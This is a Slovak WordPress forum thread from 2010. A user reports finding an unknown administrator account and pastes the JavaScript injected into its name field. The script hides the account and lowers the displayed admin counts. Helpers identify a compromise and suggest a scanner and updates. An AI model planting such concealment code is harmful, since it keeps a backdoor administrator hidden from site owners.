+ Odpoveď na tému
Zobrazenie výsledkov 1 až 10 z 12

Téma: Bezpečnostná chyba - druhý administrátorský učet !

Hybrid View

Umiestnenie
    www.WP.sk
    Vďaka
    1

Predvolené Bezpečnostná chyba - druhý administrátorský učet !

Užívateľ ssugi napísal:

cawko sorrky ze ta otravujem ale nemam pocit ze to patri do fora....hrabal som sa v admine wordpressu a nasiel som uzivatela administratora s tymto krstným menom (first name) ...
    <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>
    Je to nejaka bezpecnostna chyba wordpressu alebo mam nieco zle nastavene alebo nevies? dufam ze mi pomozes vdaka
    Naposledy upravil JohnnyPea; 09.04.2010 o 12:07
    WordPress po slovensky! www.WP.sk | info@wp.sk | johnnypea@wp.sk

Prosím dodržujte tieto pravidlá: v príspevkoch používajte diakritiku;vyplňte správne predmet príspevku; pre nový problém otvorte novú tému a nepokračujte v nesúvisiacej starej téme; pri popise problému uveďte aj adresu webu, na ktorom sa problém vyskytuje.
    Súkromné správy píšte naozaj len vo výnimočných situáciách! Dotazujte sa priamo na fóre, tam dostanete odpoveď skôr!(alebo požiadajte o platenú podporu TU!)

www.webikon.sk | www.wphosting.sk | www.wp.sk | www.techforum.sk | johnnypea.wp.sk

Umiestnenie
    www.WP.sk
    Vďaka
    1

Predvolené

S najväčšou pravdepodobnosťou to má spojitosť ešte s týmto (keďže si neuviedol akú verziu WP používaš) http://www.wp.sk/wordpress-284-ala-d...nostny-update/ - vlastne, tvoja stránka bola napadnutá a v istom zmysle "hacknutá".

Skús použiť tento modul http://wordpress.org/extend/plugins/exploit-scanner/ , ktorý ti prehľadá WP, či tam nemáš nejakú pliagu...

Každopádne, ak nemáš najnovšiu verziu, tak odporúčam aktualizovať...

Články ktoré sa venujú tomuto problému:

Prosím dodržujte tieto pravidlá: v príspevkoch používajte diakritiku;vyplňte správne predmet príspevku; pre nový problém otvorte novú tému a nepokračujte v nesúvisiacej starej téme; pri popise problému uveďte aj adresu webu, na ktorom sa problém vyskytuje.
    Súkromné správy píšte naozaj len vo výnimočných situáciách! Dotazujte sa priamo na fóre, tam dostanete odpoveď skôr!(alebo požiadajte o platenú podporu TU!)

www.webikon.sk | www.wphosting.sk | www.wp.sk | www.techforum.sk | johnnypea.wp.sk

Vďaka
    0

Predvolené

vdaka za odpoved idem to prestudovat...mam aktualnu verziu wordpressu aj s aktualnymi pluginmi preto som sa cudoval ked som nieco take nasiel

EDIT: Tak vyskusal som ten plugin ktory si mi odporucil ale nepodarilo sa mi ho rozchodit...nastavil som memory limit (40MB) ale aj tak sa mi po po kliknuti na "run the scan" zobrazi ta ista stranka ako predtym...vyskusal som prehliadace Operu a Chrome ale stale to iste :-(
    Naposledy upravil sssugi; 09.04.2010 o 13:28

Umiestnenie
    www.WP.sk
    Vďaka
    1

Predvolené

Skú nastaviť/si dať nastviť "memory limit" minimálne na 64MB

Vďaka
    0

Predvolené

To asi nepojde som na webhostingu kde to nie je mozne...vedel by si este o nejakej inej moznosti?

Umiestnenie
    už Bratislava
    Vďaka
    0

Predvolené

súbor ".htaacess" a
    Kód:
    php_value memory_limit 64M
    alebo do php:
    PHP kód:
     <? ini_set("memory_limit""64M"); ?>
    S potešením A.Verona